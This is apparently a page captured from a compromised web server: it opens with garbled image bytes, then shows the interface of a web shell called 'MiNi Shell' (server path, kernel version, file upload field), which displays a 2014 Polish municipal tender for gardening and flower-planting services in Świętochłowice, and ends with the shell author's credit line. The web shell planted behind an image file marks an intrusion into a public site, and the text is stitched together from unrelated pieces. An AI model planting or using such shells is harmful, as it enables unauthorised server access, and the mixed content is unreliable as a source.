JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140318/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140318/57073-N-2014.html

<p class="kh_header"><b>Świętochłowice: Świadczenie usług ogrodniczych na terenie miasta Świętochłowice, polegających na zakupie i montażu obsadzonych kwiatami donic wraz z obsadą i pielęgnacją kwiatów w donicach, wieżach kwiatowych, kwietnikach i rabatach oraz pielęgnacja rabaty bylinowo-krzewiastej</b><br>
<b>Numer ogłoszenia: 57073 - 2014; data zamieszczenia: 18.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świętochłowice reprezentowana przez Prezydenta Miasta Świętochłowice , ul. Katowicka 54, 41-600 Świętochłowice, woj. śląskie, tel. 32 3491 800, faks 32 349 18 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swietochlowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług ogrodniczych na terenie miasta Świętochłowice, polegających na zakupie i montażu obsadzonych kwiatami donic wraz z obsadą i pielęgnacją kwiatów w donicach, wieżach kwiatowych, kwietnikach i rabatach oraz pielęgnacja rabaty bylinowo-krzewiastej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług ogrodniczych na terenie miasta Świętochłowice polegających na zakupie i montażu obsadzonych kwiatami donic wraz z obsadą i pielęgnacją kwiatów na pozostałych donicach, wieżach kwiatowych, kwietnikach i rabatach oraz pielęgnacją rabaty bylinowo-krzewiastej przy ulicy Katowickiej. 
Przedmiot zamówienia obejmuje:
1.  Zakup donic obsadzonych kwiatami wraz z ich montażem na słupach oświetleniowych przy ulicy Katowickiej oraz pielęgnacją nasadzeń, w następujących ilościach:
a)  10 kompletów donic w kolorze zielonym o średnicy 600 mm i wysokości 240 mm, ich  obsadzenie i zamontowanie na okrągłych słupach oświetleniowych na ulicy Katowickiej (odcinek od ulicy Pocztowej do ulicy Szkolnej). Obsadę w terminie 01-20.06.2014 roku należy dokonać sadzonkami w ilości 9 sztuk na jedną donicę.
b) 113 donic w kolorze zielonym lub czarnym, ich obsadzenie i zamontowanie w istniejących koszach o średnicy 250 mm*) zamontowanych na słupach oświetleniowych wzdłuż ulicy Katowickiej. Obsadę w terminie 01-20.06.2014 roku należy dokonać sadzonkami w ilości 3 sztuk na jedną donicę.
*) wymiar donicy musi być dostosowany do kosza
Uwaga:
Wykonawca zobowiązany jest do posiadania dodatkowej ilości małych donic (12 sztuk) celem wymiany lub uzupełnienia w przypadku ich uszkodzenia bądź kradzieży.
2. Obsadę kwiatami donic, wież kwiatowych, kwietników i rabat zlokalizowanych na ternie Gminy Świętochłowice w terminach wskazanych przez Zamawiającego.
Obsadę wiosenną w terminie 01-20.04.2014 r. i letnią w terminie 01-20.06.2014 r. należy dokonać kwiatami z gatunku aksamitka, begonia stale kwitnąca, pelargonia rabatowa, surfinia, starzec popielny, werbena, dalia ogrodowa, koleus, gazania lśniąca, szałwia błyszcząca, rudbekia owłosiona lub żeniszek meksykański w ilości 35 sztuk na 1 m2. 
Jesienne nasadzenia należy dokonać cebulkami tulipanów w ilości 50 sztuk na 1 m2. 
Wybór odpowiednich gatunków (obsada wiosenna i letnia) oraz koloru cebulek tulipanów do obsady jesiennej na poszczególnych obiektach każdorazowo ustalany będzie z Zamawiającym. 
Całe partie materiału sadzeniowego powinny spełniać następujące wymagania:
a)	sadzonki roślin mają być jednolite, zdrowe i niezwiędnięte,
b)	pokrój roślin, barwa kwiatów i ich ilość w sadzonce powinny być charakterystyczne dla danego gatunku,
c)	stopień rozwoju, wielkość i sposób uformowania dla sadzonek powinny być jednakowe dla całej partii, 
d)	bryła korzeniowa powinna być dobrze przerośnięta korzeniami, wilgotna i nieuszkodzona,
e)	niedopuszczalne jest występowanie w partii roślin innych gatunków i odmian,
f)	niedopuszczalne jest występowanie na roślinach chorób, szkodników i uszkodzeń mechanicznych.
Uwaga:
- donice przeznaczone do obsady na ulicy Korfantego, Pocztowej i Katowickiej (poza planowanymi do zakupu) są w posiadaniu Zamawiającego. Wykonawca zobowiązany jest do ich obsady minimum 30 dni przed montażem na słupach oświetleniowych oraz przechowywania do tego czasu w warunkach szklarniowych.
- Zamawiający zastrzega, iż w obsadzie letniej sadzonki pelargonii i surfinii muszą stanowić około 40% całości nasadzeń na terenie miasta.
- Zamawiający zastrzega sobie prawo odbioru materiału sadzeniowego na 3 tygodnie przed przystąpieniem do jego nasady.
- Wykonawca zobowiązany jest do zabezpieczenia minimum 10% materiału sadzeniowego na wymianę i uzupełnienie ubytków (przez okres pierwszego miesiąca licząc od dnia nasady wiosennej i letniej). Wymiana i uzupełnienie ubytków może być powodowana niesprzyjającymi warunkami atmosferycznymi lub przyczynami niezależnymi od Zamawiającego, np. kradzież czy inne prace ziemne, których nie można było przewidzieć wcześniej). 
3.  Pielęgnację donic, wież kwiatowych, kwietników i rabat obsadzonych kwiatami wraz z pielęgnacją rabaty bylinowo - krzewiastej (skarpa) przy ul. Katowickiej oraz likwidacją przekwitłych kwiatów po sezonie.
Systematyczna pielęgnacja nasadzonych kwiatów obejmuje przekopywanie, zasilanie, podlewanie, plewienie, nawożenie, uzupełnienie ziemi i ubytków w kwiatostanie oraz usuwanie przekwitłych kwiatów po sezonie. 
Pielęgnacja rabaty bylinowo - krzewiastej przy ul. Katowickiej obejmuje: koszenie (10 razy w okresie pielęgnacji*), nawożenie (2 razy w okresie pielęgnacji*)), plewienie (4 razy w okresie pielęgnacji*), nawożenie krzewów (2 razy w okresie pielęgnacji*) i oprysk przed szkodnikami (2 razy w okresie pielęgnacji*).
*) okres pielęgnacji od 01.04 do 30.09.2014 r.
Uwaga:
1. Ilości i rodzaje donic do obsady na poszczególnych ulicach:
a)	ulica Pocztowa - 8 donic na słupach oświetleniowych o średnicy 600 mm ( 9 sztuk sadzonek na donicę),
b)	ulica Korfantego - 6 donic na słupach oświetleniowych o średnicy 800 mm (10 - 12 sztuk sadzonek na donicę),
c)	przy siedzibie Urzędu Miejskiego - 8 donic na słupach oświetleniowych o średnicy 800 mm (10-12 sztuk sadzonek na donicę),
d)	ulica Katowicka (deptak):
- 10 donic okrągłych betonowych o powierzchni 1 m2 (35 sztuk sadzonek na 1 m2),
- 45 donic kwadratowych betonowych o powierzchni 0,5 m2 (35 szt. sadzonek na 1 m2),
- 24 donice na słupach oświetleniowych o średnicy 600 mm (9 sztuk sadzonek na donicę).
2. Donice na słupach oświetleniowych należy obsadzić sadzonkami pelargonii o minimum dwóch pędach (w jednej sadzonce) i długości około 20 cm tak, aby wierzch donicy pokryty był materiałem zielonym.
3. Jednocześnie zaznacza się, iż kwietnik na Plantach Bytomskich, przy ulicy Chorzowskiej/Bieszczadzkiej i Stawowej oraz przy Drogowej Trasie Średnicowej został jesienią ubiegłego roku obsadzony cebulkami tulipanów. W związku z powyższym Zamawiający odstępuje od ich obsady wiosennej i zastrzega dokonanie na w/w obiektach wcześniejszej obsady letniej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.30.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa w tym zakresie  szczegółowego warunku udziału w postępowaniu.
Zamawiający dokona oceny spełnienia  tego warunku udziału w postępowaniu na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że  wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: 
1.2.1. co najmniej dwie (2) usługi polegające na świadczeniu usług ogrodniczych, w tym obejmujące pielęgnację rabat kwiatowo-byliniasto-cebulowych, o wartości nie mniejszej niż 160.000 zł brutto każda usługa;
1.2.2. co najmniej dwie (2) usługi polegające na obsadzie i pielęgnacji minimum 100 sztuk donic wiszących. 
Przez dwie (2) usługi Zamawiający rozumie usługi  wykonane na podstawie dwóch (2) umów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa w tym zakresie  szczegółowego warunku udziału w postępowaniu.
Zamawiający dokona oceny spełnienia  tego warunku udziału w postępowaniu na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż dysponuje lub będzie dysponował osobami zdolnymi do wykonania niniejszego zamówienia tj. kierownikiem prac posiadający minimum średnie wykształcenie w zakresie ogrodnictwa lub urządzania zieleni.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa w tym zakresie  szczegółowego warunku udziału w postępowaniu.
Zamawiający dokona oceny spełnienia  tego warunku udziału w postępowaniu na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. wypełniony i podpisany  formularz ofertowy  (treść formularza zamieszczona w załączniku nr 2),
2. oświadczenie o części zamówienia, której wykonanie, Wykonawca zamierza powierzyć podwykonawcom 
(w treści formularza ofertowego pkt 4) w przypadku powierzenia przez Wykonawcę części zamówienia podwykonawcom,
3. pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarciu umowy, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy (dotyczy również wspólników spółki cywilnej),
4. pełnomocnictwo do występowania w imieniu Wykonawcy, w przypadku gdy dokumentów składających się na ofertę nie podpisuje osoba uprawniona do reprezentowania Wykonawcy zgodnie z odpisem z Krajowego Rejestru Sądowego lub Wykonawca  w przypadku osób fizycznych.
5. informację o  przynależności do grupy kapitałowej składanej w trybie art.26 ust.2d ustawy (wzór informacji o  przynależności do grupy kapitałowej składanej w trybie art.26 ust.2d ustawy zamieszony w załączniku nr 5),
6. kosztorysy ofertowe wypełnione zgodnie z załącznikami nr 9, 10, 11
7. jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach  innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zamawiający, w celu oceny, czy wykonawca będzie  dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy  stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, wymaga przedstawienia dokumentów określających zakres dostępnych wykonawcy zasobów innego podmiotu, sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem, zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
a) zmiany przez Zamawiającego terminów realizacji przedmiotu zamówienia, o których mowa w § 3 wzoru umowy,
b) zmiany Podwykonawcy, wprowadzenia nowego Podwykonawcy lub rezygnacji z dotychczasowego Podwykonawcy oraz zmiany zakresu prac powierzonych Podwykonawcy.	
c) zmiany podwykonawców na zasoby, których powoływał się Wykonawca w celu wykazania spełniania warunków udziału w postępowaniu, pod warunkiem, że proponowany inny podwykonawca lub sam Wykonawca  samodzielnie spełnia  warunki udziału w postępowaniu w stopniu nie mniejszym niż dotychczasowy podmiot ( podwykonawca).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.swietochlowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Zamówień Publicznych - Urząd Miejski Świętochłowice ul. Katowicka 54..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2014 godzina 10:00, miejsce: Wydział Zamówień Publicznych - Urząd Miejski Świętochłowice ul. Katowicka 54 pokój 115-116..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com